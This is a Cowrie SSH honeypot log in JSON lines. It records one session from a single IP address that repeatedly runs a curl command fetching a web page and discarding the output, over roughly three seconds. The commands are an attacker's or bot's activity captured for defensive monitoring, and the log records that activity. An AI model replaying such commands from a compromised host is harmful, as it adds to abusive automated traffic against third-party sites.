{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:33.925095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.075054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.076244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.113338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.114312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.152787Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.153801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.192097Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.193478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.231520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.232505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.272683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.273655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.310809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.312053Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.349400Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.350418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.388436Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.389395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.426624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.427649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.475105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.476114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.513604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.514626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.553143Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.554167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.592328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.593373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.636008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.637002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.675367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.676347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.713019Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.713990Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.751959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.753265Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.791132Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.792096Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.829227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.830250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.877327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.878583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.916520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.917408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.957985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.958942Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:34.995509Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:34.996390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.033206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.034194Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.072900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.073813Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.111333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.112257Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.164342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.165261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.220792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.221699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.262222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.263188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.310359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.311371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.356392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.358304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.394707Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.395613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.432355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.433191Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.478634Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.479888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.518610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.519622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.557433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.558373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.598020Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.599293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.643385Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.644274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.683351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.684240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.730823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.731869Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.769480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.770561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.810290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.811239Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.848405Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.849417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.886570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.887598Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.926492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.927791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:35.964351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:35.965325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.003034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.004266Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.099357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.100886Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.154302Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.155262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.208839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.209925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.246791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.248128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.286798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.287842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.325274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.326273Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.363789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.364638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.401331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.402256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.443161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.444128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.484144Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.485067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.521572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.522476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.560614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.561547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.608607Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.609477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.646024Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.646967Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.705474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.706768Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.751892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.752917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.792167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
